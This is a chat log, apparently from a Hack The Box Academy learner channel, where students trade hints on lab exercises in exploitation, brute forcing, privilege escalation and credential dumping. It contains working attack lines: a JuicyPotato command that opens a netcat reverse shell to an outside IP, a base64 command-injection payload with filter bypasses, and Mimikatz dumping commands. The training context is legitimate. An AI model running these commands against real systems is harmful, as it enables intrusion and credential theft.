I mean, it was the same, output in my case, but I configured the metasploit specifically for x64

It worked

is there a reason

Of course it's confusing

i have experience with metasploit

ohh

this part should have been easy

i want to do other modules first just that

Yeah, I even marked up that in my notes😂

dunno what I am doing wrong

I did a scan found out smb brain clicked to eternal blue cuz of ties to metasploit in prev modules and no other services are vul. I then filled the rhost and lhost. and ran it its giving error and the I checked the payload windows/x64/meterpreter/reverse_tcp

something wrong in the flow?

Okay, wait a while, i will check it up

thanks

i am very sorry

mate, you had to check up that http port

there is one Microsoft IIS httpd 10.0 service running

yeah, run nmap with -sV -sC

you will see that http port with better response

I did

great

enumerate it

I tried looking for httpd 10.0

Nothing good came of it

probably the exploit is in the service running in the web server

no, please access that http page

httpd 10.0 is nothing

to search about

Yes i agree nothing popped

ofc

since it is nothing

just nmap fingerprinting it

I will try it in the afternoon its 5am now spent the night on metasploit lab 2

but if you take a look at the web service with a browser you will see what is running

yeah, now i am still laughing at person who was writing here to not run any port scans

and search for that

i dont know if u have to run nmap in this case

yeah)

if you dont know if port 80 is open yea run it

I don't want to spoiler, there's something else)

kk

gl mate, just enumerate carefully

I tried the browser but nothing came maybe it was the old target i will give it another try today later

as i said i did not do the module, im just pointing out that IIS httpd 10.0 is not something to search for exploits generally

Thanks

i mean the ip:port would be better approach

I will update you once I do it

Thanks guys

yeah this isnt oscp, web server versions arent likely to be relevant

HAHAHAHA

Im completely serious

this isnt CVE find and exploit

nah i just laugh because OSCP is super CVE involved

yeah

and i dont agree with that type of exam

but totally a super good cert to have

the 24h time limit is for sure difficult

and they hate automated tools

yes xD

w.e. most people need it to find a job

one cert i want from OffSec is OSEP, i find it very interesting

but off-topic

agree

OSWE also seems interesting

any hints? I think hydra takes already to long for an module question. But it states create the mutated wordlist from the files in the ZIP. I took the rules and the pw-list from the Zip. Not much more combinations left. Maybe I overlook something. Ty!

try without sorting the file ... as that might place the intended pass somewhere at the bottom

try ftp or smb, not ssh, also use -t 48 to bruteforce faster

||tail -n +17001 your_mut_passwd_list >> modifiedfile.list( little hint to crack faster)||

thanks for your help already. I have msf running in parallel for smb but so far still running without any findings

made a new file without sort now, lets see

I will check for your hints also, ty ty

yeah worked, thanks! This one needs some patience. I'm a little afraid of the exam now. In the end losing too much time because something doesn't fit with the list while bruteforcing. Better watch twice here, or try multiple lists in parallel 😄 Thanks again!

I really enjoyed this module:

https://academy.hackthebox.com/achievement/1009496/88

it is done

SO ! I finally got this file, I understood after your help that I just had to change the ||FILEPATH|| parameter, yet I wasted another 30 minutes trying to predict where the flag was in the architecture by trying various /simple-backup/ combinations as I thought that the text on the site was a clue to find the flag, despite its path being given in the htb question in the first place 🤦‍♂️ I never felt so relieved / happy and mad to myself at the same time before ahahah, thanks for the help anyway I might have to learn how to not overcomplicate everything ^^ thanks for your help too @acoustic owl

Read #welcome and #rules

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

hi, sorry i just started my cyber journey. how did you know we are only supposed to scan 53

The module heavily hints it

It's also highly different depending on the academy module

Hi, I have question for the Windows Privilege Escalation Skill assessment module, I got a rev shell and currently working for privesc, I have tried to use printspoofer, roguepotato, and juicy potato, none of it worked. Finally I discover to use CLSID which giving me this output:

PS C:\windows\temp> ./juicypotato.exe -t * -l 1337 -p "C:\windows\temp\nc.exe 10.10.14.206 1236 -e powershell" -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
./juicypotato.exe -t * -l 1337 -p "C:\windows\temp\nc.exe 10.10.14.206 1236 -e powershell" -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
Testing {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 1337
......
[+] authresult 0
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM

[-] CreateProcessWithTokenW Failed to create proc: 2

[-] CreateProcessAsUser Failed to create proc: 2
[+] calling 0x000000000088ce08

Did I miss something? I haven't got any information on google regarding the create proc:2

How many CLSIDs did you try? You can't just pick one and go with it

I tried using the test_clsid.bat which give me the list of clsid that have NT AUTHORITY\SYSTEM, but none of it worked so far

Am I on the right track? or there's something that I missed?

did you choose the CLSIDs from the correct operating system?

Yes, I already choose the CLSIDs from the systeminfo output, where I get the list of CLSID from the github tools page, but still I didn't get any reverse shell, it end up showing "Failed to create proc: 2" message

Is the problem because I using netcat shell not the RDP?

Try to create a shell with Meterpreter and call this shell (yourfile.exe)

Glad to read it

Ok, I got CreateProcessWithTokenW OK, but it I didn't get the shell to my multi/handler metasploit

Module:Password Attacks
Section:Pass the Hash (PtH)
tried cme smb -sam to dump hashes, but there is no david, also tried with mimikatz and also there is no hash for david user, could someone help me pls?

which command did you use with Mimikatz?

||lsadump::lsa /patch, also used lsadump:sam /system:C:\system /sam:C:\sam||

Yeah there's more to Mimikatz than lsadump, try other commands taught in the module

ok i will check, thank you

well i reread all module, and there is no other things, well i tried also to dump ndst but there is nothing, here check it, (at screenshot u can see david thing but this hash is not working)

Hello, guys i am new here I am having trouble in Comamand Injection Module in the Skill Assesmnet part you see I am getting the error Error while moving: mv: ‘/var/www/html/files/2561732172.txt’ and ‘/var/www/html/files/2561732172.txt’ are the same file. I am creating the base 64 unecoded version
echo -n 'cat ${PATH:0:1}flag.txt' | base64
this is the whole thing
**?to=&bash<<<$(base64 (%09) -d<<<Y2F0IC9mbGFnLnR4dA==)&from=2561732172.txt&finish=1&move=1 **where am I making a mistake

sekurlsa::logonpasswords

https://letmegooglethat.com/?q=mimikatz+dump+current+session

oh i didnt know this thing, im gonna check it

the command is not in the section but a lot of commands are not even in the path, you are supposed to investigate stuff

sometimes errors can show commands output like cat

I know but it is not showing it

try harder

Huh, you're right, seems it wasn't there

But research is expected regardless

?

you are in the right track just try more stuff

yee moral support

1st try to find the injection point, the site answer you with Malicious request detected

this means you are getting something blacklisted

try to bypass it

injection point is bypassed

i shoudl be getting the malicuis request denied if i had

a problem with that

can you do an ls?

or whoami

Your screenshots contain some spoilers and can be seen as a spoiler

oh sorry i will delete it

ye

just cat the flag then xd

bypass space and bypass slash

I'm stuck on the Last question of Active Directory Enumeration and Attack, I can't seem to perform the DCSync with the creds for t***. I have tried to do this from MS01 with secretsdump.exe.

Can anyone assist me?

i have done that 100 times xd

dm me your payload

nvm I figured something out

Wsg y'all. I am at Vuln Assessment the Nexus Skill thingy.
I do the scan, for some reason it takes seconds. I configure the target and the authentication , but when I download the report it's all blank. I did a scan after I SSHed to the generated 10.129 - target. The target on nessus was 172.16.16.100.
What am I doing wrong?

What's the idea of the spawned target system if I am already given an IP. I just don't get the logic.

Wait bruh, follow me through. I get into the target with SSH, run the nessus start command on the enemy target , from where I log into nessus with the given credentials, which I enter afterwards in the configuration?

you dont have to run any scan

read thoroughly the content of the section

the spawned ip has running the nessus dashboard

wait for it a couple of minutes to set up

its running under https in the port taught in the module

ssh connection isn’t necessary either

what the fuck have I been doing.

Aight, will re-read it all.

i suggest you to do the skill assessment while reading it

because it guides you

You connect to the Nessus port on the spawned target via https

Will do, fellas.

use crackmapexec and instead of -p use -H

anybody available to talk about the way they solved LINUX PRIVILEGE ESCALATION > Escaping Restricted Shells > Use different approaches to escape the restricted shell and read the flag.txt file ?
I solved it using|| ssh xxxx -t "sh" ||and wonder how other did it ?

Is it okay to use mutated password list in Password Attacks Skills Assessments? i dont need rockyou.txt right?

As soon as you create the list, it's used throughout the entire module

If something doesn't crack with it, only then you switch to rockyou

Hello guys

can someone help me with the last lab of the nmap module? (the Hard one)

Source port

yup i alredy use --source-port 53

Are you doing a full port scan

-p- yes sir

Udp?

-sU yes sir

Have you tried tcp?

-sA and -sT too

Weird but if you mostly follow the ids/ips evasion section under proxying it'll be more helpful

Oh right it's the Syn scan

-sS?

but this one is the default with root account

I'm confused about the question in it's self because it's seems to me that they are talking about the Dns

maybe -sT with source-port 53

after that listen with nc -nv(found a strange port or anything like this)

and just wait for banner, it may take 1 minute

humm..

also u can try -Pn and -n

i'm stuck at this lol

just as i said, he must use nc -nv <ip> <port> after nmap scan, to grap a banner

netcat also has the source port flag

-p

How do we add the registry key that would enabled 'Windows Admin mode' if we don't have access to the windows machine.

https://academy.hackthebox.com/module/147/section/1638

with netexec/crackmapexec for example

also with psexec.py

I now see that Impacket is also a solutio

can you explain why only that "port" work?

53?

the firewall accepts inbound connections if they come from port 53 for DNS resolution

it’s explained in the section

guys im trying to download a file with smbclient but file is too big, how to download it with crackmapexec or when mounting a drive to /mnt how to specify user?

Ok I got it

with smbclient how

it prints an error

I'm telling you how to find it, DNS is only related due to --source-port

i think i did it with http

let me check

Use remmina, it works better

unrelated to the question

They can’t access the box to change the things they need in the registry because of xfreerdp, so it’s definitely related if you use remmina to access the box

Okay, good morning everyone. I am stuck on the Skills assesment of INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC. I have been reading web pages all morning and trying my best to build this KQL query to search for "Lateral Tool Transfer". Here is my Query:||(event.category: "command" OR event.category: "file" OR event.category: "named pipe" OR event.category: "network" OR event.category: "process") AND
(event.action: "execution" OR event.action: "creation" OR event.action: "modification" OR event.action: "connection" OR event.action: "access" OR event.action: "start") AND
user.name: "r*"||

you wont have access with Remmina either

Yes they will

no they wont

re-read the section

https://tenor.com/view/grinch-yes-no-indecision-the-grinch-gif-15678946

to allow PtH you need the registry key

Lmao ok

👍

i downloaded it with smbclient

without problems

Use win-rm

It literally explains in the section that you need to use a command using evil-winrm

well maybe it bcs of my kali machine, gonna try it with pwnbox

yes try

i did on my Parrot

idk!

Good Morning im having issues-WINDOWS PRIVILEGE ESCALATION-DNSAdmins can anyone give me a nudge

Read the Question again

Create a KQL query to hunt for "Lateral Tool Transfer" to C:\Users\Public.

you can try the mount method as you said !

you can specify the username and password with -o

remember installing cifs-utils

#general message

This linked article works really well

he isnt at that point yet !

he is trying to get the .vhd

Yes

to crack it o.O

This is slightly more recent #modules message

I'm helping the process to mount it :p

personally used Windows, full compatibility with vhd files

Honestly the second link works really well

lately im using Windows a lot

to complete the modules

¯_(ツ)_/¯

getting used to work from a Windows

very cool for Active Directory stuff

I was able to follow the article step-by-step and made it work first try

Well yeah

AD and windows makes sense